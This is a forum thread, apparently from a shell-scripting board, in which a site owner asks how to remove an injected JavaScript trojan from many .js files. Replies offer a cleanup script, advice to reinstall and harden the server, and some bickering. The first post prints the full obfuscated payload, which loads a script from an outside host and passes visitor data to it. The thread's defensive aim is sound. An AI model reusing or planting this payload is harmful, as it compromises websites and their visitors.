how to remove hacking code from multiple files


 
# 1  
Old 10-02-2012
how to remove hacking code from multiple files

Hello,

I've located with clamav multiple .js files infected at the end with the following (JS.Trojan.Redir-3) code:

Code:
var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29
\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27
\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B
\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63
\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63
\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72
\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D
\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69
\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79
\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C
\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,
_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--)
{_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return 
_0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3])
{_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} 
(_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

I would like to remove all of these with a shell command.

I would use as an example this one :
Code:
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.*|$1\n|s'

but I'm not sure what to change with all the escape characters and the * symbols.

Any help would be appreciated.
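An added example, not from the thread and not anyone's posted command, of one way to do what the question asks with POSIX tools. It assumes the injected block always begins with the literal text `var _0x4470=[` (taken from the sample above) and runs to the end of the file; the function names, the temporary-directory demo and its three sample files are constructed for illustration. Because the marker is matched with awk's `index()` rather than a regular expression, the `*`, `[` and `\x..` sequences in it need no escaping, which was the sticking point with the perl one-liner.

```shell
#!/bin/sh
# Added example, not from the thread. Removes an appended block from every .js
# file under a directory. Assumption: the injected block begins with the literal
# text in MARKER (copied from the sample in the question) and runs to end of file.
# awk's index() is a plain substring search, so nothing in the marker needs regex
# escaping. The marker is passed through ENVIRON rather than awk -v, because -v
# would interpret backslash escapes in the value.

MARKER='var _0x4470=['
export MARKER

# list_infected DIR: dry run, prints the .js files under DIR that contain the marker.
# Review this list before cleaning anything.
list_infected() {
    find "$1" -type f -name '*.js' -exec grep -lF "$MARKER" {} +
}

# strip_injected FILE: keeps a FILE.bak copy, then removes everything from the
# first occurrence of the marker to the end of the file. Code that precedes the
# marker on the same line is preserved. Reports what it did on stdout.
strip_injected() {
    f=$1
    if ! grep -qF "$MARKER" "$f"; then
        printf 'clean:   %s\n' "$f"
        return 0
    fi
    cp -p "$f" "$f.bak"
    awk '
        BEGIN { m = ENVIRON["MARKER"] }
        found { next }                       # drop every line after the marker line
        { p = index($0, m) }                 # literal search, no regex involved
        p == 0 { print; next }               # marker absent: keep the line unchanged
        { found = 1; if (p > 1) print substr($0, 1, p - 1) }   # keep code before marker
    ' "$f.bak" > "$f"
    printf 'cleaned: %s\n' "$f"
}

# clean_tree DIR: apply strip_injected to every .js file under DIR.
clean_tree() {
    find "$1" -type f -name '*.js' | while IFS= read -r f; do
        strip_injected "$f"
    done
}

# demo: builds three constructed files in a temporary directory (two carrying a
# shortened stand-in for the injected block, one clean), cleans them, reports on
# stderr and prints the directory path so the result can be inspected.
demo() {
    d=$(mktemp -d)
    mkdir "$d/site"
    cat > "$d/site/app.js" <<'EOF'
function ok(){return 1;}
var _0x4470=["\x39\x3D\x31\x2E"];eval(function(a){return a;}(_0x4470[0]));
EOF
    cat > "$d/site/widget.js" <<'EOF'
var w=2;var _0x4470=["\x7C"];eval(1);
EOF
    cat > "$d/site/lib.js" <<'EOF'
var x = 1; /* a * b */
EOF
    list_infected "$d/site" >&2
    clean_tree "$d/site" >&2
    printf '%s\n' "$d"
}

# "sh thisfile.sh demo" runs the constructed demonstration.
case "${1-}" in demo) demo ;; esac
```

Usage against a real tree: run `list_infected /vhosts` first and spot-check a few hits, then `clean_tree /vhosts`, then `diff file.js file.js.bak` on a sample to confirm only the trailing block went away. The truncation assumes nothing legitimate follows the marker; if your infection differs (block in the middle of a file, or a different leading string), change `MARKER` and inspect the diffs before deleting the `.bak` copies. The `while read` loop breaks on filenames containing newlines; with `-print0`/`xargs -0` available, as in the question's own command, that variant is safer.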
# 2  
Old 10-03-2012
Suggestion: if this is Java for an application, remove the app completely and then re-install. Assuming these are required for some application that users need, you could break the application by trying to uninject code.

If new files just magically appeared then delete the whole files.

However the code got injected, there are some problems on the system with permissions, or someone is surfing the net with privilege, or working on questionable sites. You need to block the behavior or change file permissions that put the code there.

And consider hardening your system.
# 3  
Old 10-03-2012
Yeah, restore from backup or re-install. Would you ever really trust those files again? I wouldn't.
# 4  
Old 10-04-2012
I'm not asking for opinions on whether I should harden the server or delete the files.
My question is specifically about removing specific text from multiple files with a shell command or script.
Maybe the text wouldn't be hack code, maybe it would be a poem; still I want to do the same thing, removing specific text from multiple files with a shell command or script.
# 5  
Old 10-04-2012
Quote:
Originally Posted by MaRiOsGR
I'm not asking for opinions
Please accept my sincere apologies for the impetuosity of my young and inexperienced colleagues who tried to help you. Of course they were wrong.

Quote:
I would like to remove all of these with a shell command.
To strictly answer your question: use any text-editing tool you like, including (but not limited to): awk, sed, perl, ed, ex, vi, ... All of these tools can be invoked as shell commands.

Quote:
I would use as an example this one :

Code:
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i [...]

but I'm not sure what to change with all the escape characters and the * symbols.
If you are not sure, I suggest you use another tool with which you are. Replace "perl" with "awk", "sed" or any other of the aforementioned text filters until you find one with which you are indeed sure, then use that one. To suggest one would largely be a matter of opinion and you specifically did not ask for that, so I will keep my completely arbitrary personal pejoratives to myself.

I hope this helps.

bakunin
# 6  
Old 10-04-2012
Quote:
Originally Posted by bakunin
To suggest one would largely be a matter of opinion and you specifically did not ask for that, so i will keep my completely arbitrary personal pejoratives to myself.
It's "good" to see you have spare time for irony;
it has nothing to do with helping, but of course everyone can post whatever he likes.

While posting here in the forum I see
Quote:
Shell Programming and Scripting Post questions about KSH, CSH, SH, BASH, PERL, PHP, SED, AWK and OTHER shell scripts and shell scripting languages here.
I'm sure they put it there for a reason, so the replies I got were about the security of the server and not about the correct usage of perl:
Code:
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.*|$1\n|s'

I know you got insulted for a reason I cannot explain with my previous post, but my question was specific and I was trying to narrow down the possible answers.

Someone could also reply that I should not use javascript
or that I shouldn't use linux servers,
but that would be no help at all, would it?

Quote:
Originally Posted by bakunin
If you are not sure, I suggest you use another tool with which you are.
If I were sure of another tool or the exact command,
I wouldn't post this, asking for people who know how to use it correctly,
would I?
# 7  
Old 10-04-2012
If there was an easy magic do-everything fix for you, we'd give it to you so you could get it fixed and stop insulting us.

It's not "opinion". I've dealt with this before. These kinds of malware infections are designed to be difficult to detect and remove. When I ran into a situation like this where the customer had no backups, I wrestled with it for days, but removing the bad parts kept breaking the pages, and it made efforts to put itself back that made everything worse than when I started. I eventually had to track down the original .zip files for the software -- thank goodness the internet is huge, some data-packrat somewhere or other is likely to have anything -- replace everything with a .php extension, and remove everything else newer than 90 days old.

Then afterwards, I secured the permissions properly so it wouldn't happen again...